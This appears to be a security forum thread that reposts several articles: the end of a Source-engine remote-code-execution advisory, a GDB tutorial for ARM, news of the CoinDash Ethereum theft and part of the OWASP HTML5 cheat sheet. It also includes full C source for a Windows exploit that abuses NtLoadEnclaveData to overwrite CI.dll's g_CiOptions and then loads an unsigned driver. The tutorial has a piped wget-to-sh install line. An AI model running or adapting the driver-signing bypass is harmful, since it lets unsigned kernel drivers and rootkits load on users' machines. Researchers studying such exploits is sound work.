pValue, ','); ... } } Mitigation Bypass Address Space Layout Randomization (ASLR) is a powerful mitigation against exploiting memory corruption vulnerabilities. The mitigation randomizes the addresses where executables are loaded into memory. This feature is opt-in, and all executables loaded into memory of a process must have it enabled in order for it to be effective. The DLL steamclient.dll did not have ASLR enabled. This meant the address of executable pages of steamclient.dll loaded into memory at predictable addresses. This allowed existing instructions within the executable memory pages to be located and used trivially. Collecting ROP Gadgets Return Oriented Programming is a technique that allows shellcode to be created by re-using existing instructions in a program. Simply put, you find a chain of instructions that end with a RETN instruction. You insert the address of the first instruction of the chain to the stack, so when a function returns the address is popped into the Instruction Pointer register, and then the instructions execute. Since x86 and x64 instructions do not need to be memory aligned, any address can be interpreted as an instruction. By setting the instruction pointer to a middle of an instruction, a wider range of instructions become available. The Immunity Debugger plugin Mona provides a utility to discover gadgets. Be aware though, the plugin doesn't find all useful gadgets, such as REP MOVS. Launching cmd.exe Due to the way the payload is processed, NULL characters can not be used, and upper case characters are converted to lower case characters. This means our ROP gadget addresses becomes limited, as well as any other data used in our payload. To get around this, the shellcode is boostraped with with a gadget chain which locates the original un-modified buffer in memory. The un-modified payload is then copied back onto the stack via a REP MOVS gadget. The steamclient.dll executable imports LoadLibraryA and GetProcaddressA. This allows us to load other DLLs into memory, and obtain references to additional exported functions. We can import Shell32.dll to obtain a reference to the function ShellExecuteA, which can be used to launch other programs. Proof Of Concept In order to give third-party mod creators time to update their games, the proof of concept will be released in 30 days. Source mod developers should apply the patch below. Delivering The Payload The Source engine allows custom content to be packed into map files. Commonly this is used for adding extra content to maps, such as sounds or textures. By packing a ragdoll model file into a map file, with the same resource path as an original ragdoll model file, our version will be used instead. Recommended Fix To prevent buffer overflows from occurring, do not store more data in a buffer than it can hold. The nexttoken function should accept a token length argument which would be used to perform bounds checking. Developers who have created a Source modification game should apply the following patch. To mitigate exploitation of memory corruption vulnerabilities, enable ASLR for all executables. Perform automated checks during the build process to ensure all executables support ASLR. This can be achieved by using the checkbins.py utility developed by the chromium team. Additionally, Source games should be sandboxed to restrict access to resources and to prevent new processes from being started. As an example of how effective proper sandboxing can be, kernel exploits are often used when exploiting web browser memory corruption vulnerabilities, since the userland browser process is so restricted. For additional information, refer to Chromium's sandbox implementation. Download Patch Final Thoughts Video games are interesting targets for exploitation, not only technically but also logistically. As video games are common inside employee break rooms and homes of employees, exploitation of a vulnerability could be used in a targeted attack to jump the air gap to a private network. Additionally, discovering a remote code execution vulnerability in a popular video game can be used to quickly create a bot net or spread ransomware. As a mitigation, games should not be installed on work devices. Gaming machines should be moved to an untrusted network, and business devicess should not connect to the untrusted network. For those who play Soruce games, the attack surface can be shrunk by disabling third-party content from downloading. This can be achieved with the console commands cl_allowdownload 0 and cl_downloadfilter all. Additionally, since the vulnerability was discovered in the Source SDK, additional third-party mods are most likely vulnerable. However, by enabling ASLR for all executable modules, a memory disclosure vulnerability is required to develop a reliable exploit. About the author: Justin Taft is a software engineer who is adamant about secure coding practices. He has worked with many Fortune 500 companies to improve their security posture of their products. From reversing firmware of biometric fingerprint readers, to performing security reviews of cloud based Java application deployments, he is experienced in tackling a wide range of security assessments. Sursa: https://oneupsecurity.com/research/remote-code-execution-in-source-games?t=r
      • 2
      • Upvote
  10. #include "global.h" HINSTANCE g_hInstance; HANDLE g_ConOut = NULL; BOOL g_ConsoleOutput = FALSE; WCHAR g_BE = 0xFEFF; RTL_OSVERSIONINFOW g_osv; #define CI_DLL "ci.dll" #define T_PROGRAMTITLE TEXT("NtLoadEnclaveData write to address Demo") #define T_PROGRAMUNSUP TEXT("Unsupported WinNT version\r\n") #define T_PROGRAMRUN TEXT("Another instance running, close it before\r\n") #define T_PROGRAMINTRO TEXT("NtLoadEnclaveData demo started\r\n(c) 2017 Project Authors\r\nSupported x64 OS : 10 RS3\r\n") #define DUMMYDRVREG L"\\Registry\\Machine\\System\\CurrentControlSet\\Services\\DummyDrv" NTSTATUS NativeAdjustPrivileges( _In_ ULONG Privilege ) { NTSTATUS Status; HANDLE TokenHandle; LUID Luid; TOKEN_PRIVILEGES TokenPrivileges; Luid.LowPart = Privilege; Luid.HighPart = 0; TokenPrivileges.PrivilegeCount = 1; TokenPrivileges.Privileges[0].Luid = Luid; TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; Status = NtOpenProcessToken( NtCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &TokenHandle); if (NT_SUCCESS(Status)) { Status = NtAdjustPrivilegesToken( TokenHandle, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, NULL); NtClose(TokenHandle); } if (Status == STATUS_NOT_ALL_ASSIGNED) Status = STATUS_PRIVILEGE_NOT_HELD; return Status; } NTSTATUS NativeLoadDriver( _In_ PWSTR DrvFullPath, _In_ PWSTR KeyName, _In_opt_ PWSTR DisplayName, _In_ BOOL ReloadDrv ) { UNICODE_STRING ValueName, drvName; OBJECT_ATTRIBUTES attr; HANDLE hDrvKey; ULONG data, dataSize = 0; NTSTATUS ns = STATUS_UNSUCCESSFUL; hDrvKey = NULL; __try { if (!ARGUMENT_PRESENT(KeyName)) { ns = STATUS_OBJECT_NAME_NOT_FOUND; __leave; } RtlInitUnicodeString(&drvName, KeyName); InitializeObjectAttributes(&attr, &drvName, OBJ_CASE_INSENSITIVE, 0, NULL); ns = NtCreateKey(&hDrvKey, KEY_ALL_ACCESS, &attr, 0, NULL, REG_OPTION_NON_VOLATILE, NULL); if (!NT_SUCCESS(ns)) { __leave; } if (ARGUMENT_PRESENT(DrvFullPath)) { RtlInitUnicodeString(&ValueName, L"ImagePath"); dataSize = (ULONG)(1 + _strlen(DrvFullPath)) * sizeof(WCHAR); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_EXPAND_SZ, (PVOID)DrvFullPath, dataSize); if (!NT_SUCCESS(ns)) { __leave; } } data = 1; RtlInitUnicodeString(&ValueName, L"Type"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } data = 3; RtlInitUnicodeString(&ValueName, L"Start"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } data = SERVICE_ERROR_NORMAL; RtlInitUnicodeString(&ValueName, L"ErrorControl"); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_DWORD, (PVOID)&data, sizeof(DWORD)); if (!NT_SUCCESS(ns)) { __leave; } if (ARGUMENT_PRESENT(DisplayName)) { RtlInitUnicodeString(&ValueName, L"DisplayName"); dataSize = (ULONG)(1 + _strlen(DisplayName)) * sizeof(WCHAR); ns = NtSetValueKey(hDrvKey, &ValueName, 0, REG_SZ, DisplayName, dataSize); if (!NT_SUCCESS(ns)) { __leave; } } NtClose(hDrvKey); hDrvKey = NULL; ns = NtLoadDriver(&drvName); if (ns == STATUS_IMAGE_ALREADY_LOADED) { if (ReloadDrv == TRUE) { NtUnloadDriver(&drvName); //unload previous driver version NtYieldExecution(); ns = NtLoadDriver(&drvName); } else { ns = STATUS_SUCCESS; } } } __finally { if (hDrvKey != NULL) { NtClose(hDrvKey); } } return ns; } LONG QueryCiOptions( _In_ PVOID MappedBase, _Inout_ ULONG_PTR *KernelBase ) { PBYTE CiInitialize = NULL; ULONG c, j = 0; LONG rel = 0; hde64s hs; CiInitialize = (PBYTE)GetProcAddress(MappedBase, "CiInitialize"); if (CiInitialize == NULL) return 0; if (g_osv.dwBuildNumber > 16199) { c = 0; j = 0; do { /* call CipInitialize */ if (CiInitialize[c] == 0xE8) j++; if (j > 1) { rel = *(PLONG)(CiInitialize + c + 1); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); } else { c = 0; do { /* jmp CipInitialize */ if (CiInitialize[c] == 0xE9) { rel = *(PLONG)(CiInitialize + c + 1); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); } CiInitialize = CiInitialize + c + 5 + rel; c = 0; do { if (*(PUSHORT)(CiInitialize + c) == 0x0d89) { rel = *(PLONG)(CiInitialize + c + 2); break; } hde64_disasm(CiInitialize + c, &hs); if (hs.flags & F_ERROR) break; c += hs.len; } while (c < 256); CiInitialize = CiInitialize + c + 6 + rel; *KernelBase = *KernelBase + CiInitialize - (PBYTE)MappedBase; return rel; } ULONG_PTR QueryVariableAddress( VOID ) { LONG rel = 0; ULONG_PTR Result = 0, ModuleKernelBase = 0; CHAR *szModuleName; WCHAR *wszErrorEvent, *wszSuccessEvent; PVOID MappedBase = NULL; CHAR szFullModuleName[MAX_PATH * 2]; szModuleName = CI_DLL; wszErrorEvent = TEXT("Ldr: CI.dll loaded image base not recognized"); wszSuccessEvent = TEXT("Ldr: CI.dll loaded for pattern search"); ModuleKernelBase = supGetModuleBaseByName(szModuleName); if (ModuleKernelBase == 0) { cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); return 0; } szFullModuleName[0] = 0; if (!GetSystemDirectoryA(szFullModuleName, MAX_PATH)) return 0; _strcat_a(szFullModuleName, "\\"); _strcat_a(szFullModuleName, szModuleName); // _strcpy(szFullModuleName, "C:\\malware\\ci.dll"); MappedBase = LoadLibraryExA(szFullModuleName, NULL, DONT_RESOLVE_DLL_REFERENCES); if (MappedBase) { cuiPrintText(g_ConOut, wszSuccessEvent, g_ConsoleOutput, TRUE); rel = QueryCiOptions( MappedBase, &ModuleKernelBase); if (rel != 0) { Result = ModuleKernelBase; } FreeLibrary(MappedBase); } else { wszErrorEvent = TEXT("Ldr: Cannot load CI.dll"); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); } return Result; } VOID LoadDriver() { NTSTATUS Status; HANDLE Link = NULL; UNICODE_STRING str, drvname; OBJECT_ATTRIBUTES Obja; WCHAR szBuffer[MAX_PATH + 1]; Status = NativeAdjustPrivileges(SE_LOAD_DRIVER_PRIVILEGE); if (!NT_SUCCESS(Status)) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NativeAdjustPrivileges result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); return; } _strcpy(szBuffer, L"\\??\\"); _strcat(szBuffer, NtCurrentPeb()->ProcessParameters->CurrentDirectory.DosPath.Buffer); _strcat(szBuffer, L"dummy.sys"); RtlInitUnicodeString(&str, L"\\*"); RtlInitUnicodeString(&drvname, szBuffer); InitializeObjectAttributes(&Obja, &str, OBJ_CASE_INSENSITIVE, 0, NULL); Status = NtCreateSymbolicLinkObject(&Link, SYMBOLIC_LINK_ALL_ACCESS, &Obja, &drvname); if (!NT_SUCCESS(Status)) { RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NtCreateSymbolicLinkObject result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); } else { Status = NativeLoadDriver(L"\\*", DUMMYDRVREG, NULL, TRUE); RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NativeLoadDriver result = 0x")); ultohex(Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); if (Link) NtClose(Link); } } typedef NTSTATUS(NTAPI *pfnNtLoadEnclaveData)( ULONG_PTR Param1, ULONG_PTR Param2, ULONG_PTR Param3, ULONG_PTR Param4, ULONG_PTR Param5, ULONG_PTR Param6, ULONG_PTR Param7, ULONG_PTR Param8, ULONG_PTR Param9 ); pfnNtLoadEnclaveData NtLoadEnclaveData; UINT NtLoadEnclaveDataDemo() { NTSTATUS Status = STATUS_SUCCESS; HMODULE hNtdll; ULONG_PTR g_CiOptions = 0; WCHAR *wszErrorEvent; WCHAR szBuffer[MAX_PATH]; g_CiOptions = QueryVariableAddress(); if (g_CiOptions != 0) { _strcpy(szBuffer, TEXT("Ldr: CI.dll->g_CiOptions found at 0x")); u64tohex(g_CiOptions, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); } else { wszErrorEvent = TEXT("Ldr: CI.dll->g_CiOptions address not found."); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); return 0; } hNtdll = GetModuleHandle(TEXT("ntdll.dll")); if (hNtdll) { NtLoadEnclaveData = (pfnNtLoadEnclaveData)GetProcAddress(hNtdll, "NtLoadEnclaveData"); if (NtLoadEnclaveData) { Status = NtLoadEnclaveData(0x00007FFFFFFFFFFF, 0x00007FFFFFFFFFFE, 0x00007FFFFFFEFFFE, 0x000000000000FFFF, 0x00007FFFFFFEFFFE, 0x00007FFFFFFFFFFF, 0xFFFF800000000000, 0x000000000000FFFF, g_CiOptions); RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer)); _strcpy(szBuffer, TEXT("Ldr: NtLoadEnclaveData returned with status = 0x")); ultohex((ULONG)Status, _strend(szBuffer)); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); if (Status == STATUS_ACCESS_VIOLATION) { _strcpy(szBuffer, TEXT("Ldr: Attempt to load unsigned demo driver")); cuiPrintText(g_ConOut, szBuffer, g_ConsoleOutput, TRUE); LoadDriver(); } } else { wszErrorEvent = TEXT("Ldr: NtLoadEnclaveData procedure not found."); cuiPrintText(g_ConOut, wszErrorEvent, g_ConsoleOutput, TRUE); } } return (UINT)Status; } void DSEFixMain() { BOOL bCond = FALSE; UINT uResult = 0; DWORD dwTemp; WCHAR text[256]; __security_init_cookie(); do { g_hInstance = GetModuleHandle(NULL); g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); if (g_ConOut == INVALID_HANDLE_VALUE) { uResult = (UINT)-1; break; } g_ConsoleOutput = TRUE; if (!GetConsoleMode(g_ConOut, &dwTemp)) { g_ConsoleOutput = FALSE; } SetConsoleTitle(T_PROGRAMTITLE); SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); if (g_ConsoleOutput == FALSE) { WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); } cuiPrintText(g_ConOut, T_PROGRAMINTRO, g_ConsoleOutput, TRUE); RtlSecureZeroMemory(&g_osv, sizeof(g_osv)); g_osv.dwOSVersionInfoSize = sizeof(g_osv); RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv); #ifndef _DEBUG if ((g_osv.dwBuildNumber < 16199) || (g_osv.dwBuildNumber > 16241)) { cuiPrintText(g_ConOut, T_PROGRAMUNSUP, g_ConsoleOutput, TRUE); uResult = (UINT)-1; break; } #endif _strcpy(text, TEXT("Ldr: Windows v")); ultostr(g_osv.dwMajorVersion, _strend(text)); _strcat(text, TEXT(".")); ultostr(g_osv.dwMinorVersion, _strend(text)); _strcat(text, TEXT(" build ")); ultostr(g_osv.dwBuildNumber, _strend(text)); cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); uResult = NtLoadEnclaveDataDemo(); cuiPrintText(g_ConOut, TEXT("Ldr: Exit"), g_ConsoleOutput, TRUE); } while (bCond); ExitProcess(uResult); } hfiref0x Sursa: https://gist.github.com/hfiref0x/1ac328a8e73d053012e02955d38e36a8
  11. DEBUGGING WITH GDB This is a very brief introduction into compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you just set up your own Lab environment in a VM by following the steps in this short How-To. You can use the following code from Part 7 – Stack and Functions, to get familiar with basic debugging with GDB. .section .text .global _start _start: push {r11, lr} /* Start of the prologue. Saving Frame Pointer and LR onto the stack */ add r11, sp, #0 /* Setting up the bottom of the stack frame */ sub sp, sp, #16 /* End of the prologue. Allocating some buffer on the stack */ mov r0, #1 /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */ mov r1, #2 /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */ bl max /* Calling/branching to function max */ sub sp, r11, #0 /* Start of the epilogue. Readjusting the Stack Pointer */ pop {r11, pc} /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */ max: push {r11} /* Start of the prologue. Saving Frame Pointer onto the stack */ add r11, sp, #0 /* Setting up the bottom of the stack frame */ sub sp, sp, #12 /* End of the prologue. Allocating some buffer on the stack */ cmp r0, r1 /* Implementation of if(a<b) */ movlt r0, r1 /* if r0 was lower than r1, store r1 into r0 */ add sp, r11, #0 /* Start of the epilogue. Readjusting the Stack Pointer */ pop {r11} /* restoring frame pointer */ bx lr /* End of the epilogue. Jumping back to main via LR register */ Using GDB Enhanced Features with GDB is highly recommended. root@labs:~# wget -q -O- https://github.com/hugsy/gef/raw/master/gef.sh | sh Save the code above in a file called max.s and compile it with the following commands: $ as max.s -o max.o $ ld max.o -o max The debugger is a powerful tool that can: Load a memory dump after a crash (post-mortem debugging) Attach to a running process (used for server processes) Launch a program and debug it Launch GDB against either a binary, a core file, or a Process ID: Attach to a process: $ gdb -pid $(pidof <process>) Debug a binary: $ gdb ./file Inspect a core (crash) file: $ gdb -c ./core.3243 $ gdb max If you installed GEF, it drops you the gef> prompt. This is how you get help: (gdb) h (gdb) apropos <search-term> gef> apropos registers collect -- Specify one or more data items to be collected at a tracepoint core-file -- Use FILE as core dump for examining memory and registers info all-registers -- List of all registers and their contents info r -- List of integer registers and their contents info registers -- List of integer registers and their contents maintenance print cooked-registers -- Print the internal register configuration including cooked values maintenance print raw-registers -- Print the internal register configuration including raw values maintenance print registers -- Print the internal register configuration maintenance print remote-registers -- Print the internal register configuration including each register's p -- Print value of expression EXP print -- Print value of expression EXP registers -- Display full details on one set may-write-registers -- Set permission to write into registers set observer -- Set whether gdb controls the inferior in observer mode show may-write-registers -- Show permission to write into registers show observer -- Show whether gdb controls the inferior in observer mode tui reg float -- Display only floating point registers tui reg general -- Display only general registers tui reg system -- Display only system registers Breakpoint commands: break (or just <function-name> break <line-number> break filename:function break filename:line-number break *<address> break +<offset> break –<offset> tbreak (set a temporary breakpoint) del <number> (delete breakpoint number x) delete (delete all breakpoints) delete <range> (delete breakpoint ranges) disable/enable <breakpoint-number-or-range> (does not delete breakpoints, just enables/disables them) continue (or just c) – (continue executing until next breakpoint) continue <number> (continue but ignore current breakpoint number times. Useful for breakpoints within a loop.) finish (continue to end of function) gef> break _start gef> info break Num Type Disp Enb Address What 1 breakpoint keep y 0x00008054 <_start> breakpoint already hit 1 time gef> del 1 gef> break *0x0000805c Breakpoint 2 at 0x805c gef> break _start This deletes the first breakpoint and sets a breakpoint at the specified memory address. When you run the program, it will break at this exact location. If you would not delete the first breakpoint and just set a new one and run, it would break at the first breakpoint. Start and Stop: Start program execution from beginning of the program run r run <command-line-argument> Stop program execution kill Exit GDB debugger quit q gef> run Now that our program broke exactly where we wanted, it’s time to examine the memory. The command “x” displays memory contents in various formats. Syntax: x/<count><format><unit> FORMAT UNIT x – Hexadecimal b – bytes d – decimal h – half words (2 bytes) i – instructions w – words (4 bytes) t – binary (two) g – giant words (8 bytes) o – octal u – unsigned s – string c – character gef> x/10i $pc => 0x8054 <_start>: push {r11, lr} 0x8058 <_start+4>: add r11, sp, #0 0x805c <_start+8>: sub sp, sp, #16 0x8060 <_start+12>: mov r0, #1 0x8064 <_start+16>: mov r1, #2 0x8068 <_start+20>: bl 0x8074 <max> 0x806c <_start+24>: sub sp, r11, #0 0x8070 <_start+28>: pop {r11, pc} 0x8074 <max>: push {r11} 0x8078 <max+4>: add r11, sp, #0 gef> x/16xw $pc 0x8068 <_start+20>: 0xeb000001 0xe24bd000 0xe8bd8800 0xe92d0800 0x8078 <max+4>: 0xe28db000 0xe24dd00c 0xe1500001 0xb1a00001 0x8088 <max+20>: 0xe28bd000 0xe8bd0800 0xe12fff1e 0x00001741 0x8098: 0x61656100 0x01006962 0x0000000d 0x01080206 Commands for stepping through the code: Step to next line of code. Will step into a function stepi s step <number-of-steps-to-perform> Execute next line of code. Will not enter functions nexti n next <number> Continue processing until you reach a specified line number, function name, address, filename:function, or filename:line-number until until <line-number> Show current line number and which function you are in where gef> nexti 5 ... 0x8068 <_start+20> bl 0x8074 <max> <- $pc 0x806c <_start+24> sub sp, r11, #0 0x8070 <_start+28> pop {r11, pc} 0x8074 <max> push {r11} 0x8078 <max+4> add r11, sp, #0 0x807c <max+8> sub sp, sp, #12 0x8080 <max+12> cmp r0, r1 0x8084 <max+16> movlt r0, r1 0x8088 <max+20> add sp, r11, #0 Examine the registers with info registers or i r gef> info registers r0 0x1 1 r1 0x2 2 r2 0x0 0 r3 0x0 0 r4 0x0 0 r5 0x0 0 r6 0x0 0 r7 0x0 0 r8 0x0 0 r9 0x0 0 r10 0x0 0 r11 0xbefff7e8 3204446184 r12 0x0 0 sp 0xbefff7d8 0xbefff7d8 lr 0x0 0 pc 0x8068 0x8068 <_start+20> cpsr 0x10 16 The command “info registers” gives you the current register state. We can see the general purpose registers r0-r12, and the special purpose registers SP, LR, and PC, including the status register CPSR. The first four arguments to a function are generally stored in r0-r3. In this case, we manually moved values to r0 and r1. Show process memory map: gef> info proc map process 10225 Mapped address spaces: Start Addr End Addr Size Offset objfile 0x8000 0x9000 0x1000 0 /home/pi/lab/max 0xb6fff000 0xb7000000 0x1000 0 [sigpage] 0xbefdf000 0xbf000000 0x21000 0 [stack] 0xffff0000 0xffff1000 0x1000 0 [vectors] With the command “disassemble” we look through the disassembly output of the function max. gef> disassemble max Dump of assembler code for function max: 0x00008074 <+0>: push {r11} 0x00008078 <+4>: add r11, sp, #0 0x0000807c <+8>: sub sp, sp, #12 0x00008080 <+12>: cmp r0, r1 0x00008084 <+16>: movlt r0, r1 0x00008088 <+20>: add sp, r11, #0 0x0000808c <+24>: pop {r11} 0x00008090 <+28>: bx lr End of assembler dump. GEF specific commands (more commands can be viewed using the command “gef”): Dump all sections of all loaded ELF images in process memory xfiles Enhanced version of proc map, includes RWX attributes in mapped pages vmmap Memory attributes at a given address xinfo Inspect compiler level protection built into the running binary checksec gef> xfiles Start End Name File 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max 0x00008054 0x00008094 .text /home/pi/lab/max gef> vmmap Start End Offset Perm Path 0x00008000 0x00009000 0x00000000 r-x /home/pi/lab/max 0xb6fff000 0xb7000000 0x00000000 r-x [sigpage] 0xbefdf000 0xbf000000 0x00000000 rwx [stack] 0xffff0000 0xffff1000 0x00000000 r-x [vectors] gef> xinfo 0xbefff7e8 ----------------------------------------[ xinfo: 0xbefff7e8 ]---------------------------------------- Found 0xbefff7e8 Page: 0xbefdf000 -> 0xbf000000 (size=0x21000) Permissions: rwx Pathname: [stack] Offset (from page): +0x207e8 Inode: 0 gef> checksec [+] checksec for '/home/pi/lab/max' Canary: No NX Support: Yes PIE Support: No RPATH: No RUNPATH: No Partial RelRO: No Full RelRO: No TROUBLESHOOTING To make debugging with GDB more efficient it is useful to know where certain branches/jumps will take us. Certain (newer) versions of GDB resolve the addresses of a branch instruction and show us the name of the target function. For example, the following output of GDB lacks this feature: ... 0x000104f8 <+72>: bl 0x10334 0x000104fc <+76>: mov r0, #8 0x00010500 <+80>: bl 0x1034c 0x00010504 <+84>: mov r3, r0 ... And this is the output of GDB (negatively, without gef) which has the feature I’m talking about: 0x000104f8 <+72>: bl 0x10334 <free@plt> 0x000104fc <+76>: mov r0, #8 0x00010500 <+80>: bl 0x1034c <malloc@plt> 0x00010504 <+84>: mov r3, r0 If you don’t have this feature in your GDB, you can either update the Linux sources (and hope that they already have a newer GDB in their repositories) or compile a newer GDB by yourself. If you choose to compile the GDB by yourself, you can use the following commands: cd /tmp wget https://ftp.gnu.org/gnu/gdb/gdb-7.12.tar.gz tar vxzf gdb-7.12.tar.gz sudo apt-get update sudo apt-get install libreadline-dev python-dev texinfo -y cd gdb-7.12 ./configure --prefix=/usr --with-system-readline --with-python && make -j4 sudo make -j4 -C gdb/ install gdb --version I used the commands provided above to download, compile and run GDB on Raspbian (jessie) without problems. these commands will also replace the previous version of your GDB. If you don’t want that, then skip the command which ends with the word install. Moreover, I did this while emulating Raspbian in QEMU, so it took me a long time (hours), because of the limited resources (CPU) on the emulated environment. I used GDB version 7.12, but you would most likely succeed even with a newer version (click HERE for other versions). © 2017 Azeria-Labs Sursa: https://azeria-labs.com/debugging-with-gdb-introduction/
      • 1
      • Upvote
  12. Hacker Steals $7 Million Worth of Ethereum From CoinDash Platform By Catalin Cimpanu July 17, 2017 An unknown hacker has taken over the official website of the CoinDash platform and modified an Ethereum wallet address during the company's ICO (Initial Coin Offering). The hack took place today, just three minutes after CoinDash launched its ICO, which is something similar to an IPO. Many startups today use ICOs to raise funds in the form of cryptocurrency. An ICO happens at predetermined dates when companies publish a cryptocurrency address on their websites, and people start sending funds. After the ICO, the company issues tokens in return, which are the equivalent of real-world stocks. The hacker breached CoinDash's website According to a statement published on its website, CoinDash says the hacker took over its website three minutes after the ICO launched and replaced the official Ethereum wallet address with his own. When the company discovered the hack, it shut down its website and announced users about the incident and the end of the ICO. The company says it received around $6 million worth of Ethereum in the first three minutes, before the hack. The hacker's Ethereum wallet shows a balance of 43,438 Ethereum, which is around $7.8 million. CoinDash estimates that around $7 million of these funds came from its users. CoinDash will issue tokens to almost all investors The company was hoping to use the ICO money to fund its Ether social-trading platform. In an official statement, CoinDash has agreed to issue tokens to almost all the persons who sent money to the hacker's wallet. CoinDash is responsible to all of its contributors and will send CDTs [CoinDash Tokens] reflective of each contribution. Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated. CoinDash is asking investors who sent money to the hacker to fill out this form. There are no other details available about the incident or how the hacker breached CoinDash's systems. The company is still investigating the incident. Image credit: CoinDash CATALIN CIMPANU Catalin Cimpanu is the Security News Editor for Bleeping Computer, where he covers topics such as malware, breaches, vulnerabilities, exploits, hacking news, the Dark Web, and a few more. Catalin previously covered Web & Security news for Softpedia between May 2015 and October 2016. The easiest way to reach Catalin is via his XMPP/Jabber address at campuscodi@xmpp.is. For other contact methods, please visit Catalin's author page. Sursa: https://www.bleepingcomputer.com/news/security/hacker-steals-7-million-worth-of-ethereum-from-coindash-platform/
  13. HTML5 Security Cheat Sheet Last revision (mm/dd/yy): 09/9/2015 Introduction 1Introduction 2Communication APIs 2.1Web Messaging 2.2Cross Origin Resource Sharing 2.3WebSockets 2.4Server-Sent Events 3Storage APIs 3.1Local Storage 3.2Client-side databases 4Geolocation 5Web Workers 6Sandboxed frames 7Offline Applications 8Progressive Enhancements and Graceful Degradation Risks 9HTTP Headers to enhance security 9.1X-Frame-Options 9.2X-XSS-Protection 9.3Strict Transport Security 9.4Content Security Policy 9.5Origin 10Authors and Primary Editors 10.1Other Cheatsheets The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion. Communication APIs Web Messaging Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind: When posting a message, explicitly state the expected origin as the second argument to postMessage rather than * in order to prevent sending the message to an unknown origin after a redirect or some other means of the target window's origin changing. The receiving page should always: Check the origin attribute of the sender to verify the data is originating from the expected location. Perform input validation on the data attribute of the event to ensure that it's in the desired format. Don't assume you have control over the data attribute. A single Cross Site Scripting flaw in the sending page allows an attacker to send messages of any given format. Both pages should only interpret the exchanged messages as data. Never evaluate passed messages as code (e.g. via eval()) or insert it to a page DOM (e.g. via innerHTML), as that would create a DOM-based XSS vulnerability. For more information see DOM based XSS Prevention Cheat Sheet. To assign the data value to an element, instead of using a insecure method like element.innerHTML = data;, use the safer option: element.textContent = data; Check the origin properly exactly to match the FQDN(s) you expect. Note that the following code: if(message.orgin.indexOf(".owasp.org")!=-1) { /* ... */ } is very insecure and will not have the desired behavior as www.owasp.org.attacker.comwill match. If you need to embed external content/untrusted gadgets and allow user-controlled scripts (which is highly discouraged), consider using a JavaScript rewriting framework such as Google Caja or check the information on sandboxed frames. Cross Origin Resource Sharing Validate URLs passed to XMLHttpRequest.open. Current browsers allow these URLs to be cross domain; this behavior can lead to code injection by a remote attacker. Pay extra attention to absolute URLs. Ensure that URLs responding with Access-Control-Allow-Origin: * do not include any sensitive content or information that might aid attacker in further attacks. Use the Access-Control-Allow-Origin header only on chosen URLs that need to be accessed cross-domain. Don't use the header for the whole domain. Allow only selected, trusted domains in the Access-Control-Allow-Origin header. Prefer whitelisting domains over blacklisting or allowing any domain (do not use * wildcard nor blindly return the Origin header content without any checks). Keep in mind that CORS does not prevent the requested data from going to an unauthenticated location. It's still important for the server to perform usual CSRF prevention. While the RFC recommends a pre-flight request with the OPTIONS verb, current implementations might not perform this request, so it's important that "ordinary" (GET and POST) requests perform any access control necessary. Discard requests received over plain HTTP with HTTPS origins to prevent mixed content bugs. Don't rely only on the Origin header for Access Control checks. Browser always sends this header in CORS requests, but may be spoofed outside the browser. Application-level protocols should be used to protect sensitive data. WebSockets Drop backward compatibility in implemented client/servers and use only protocol versions above hybi-00. 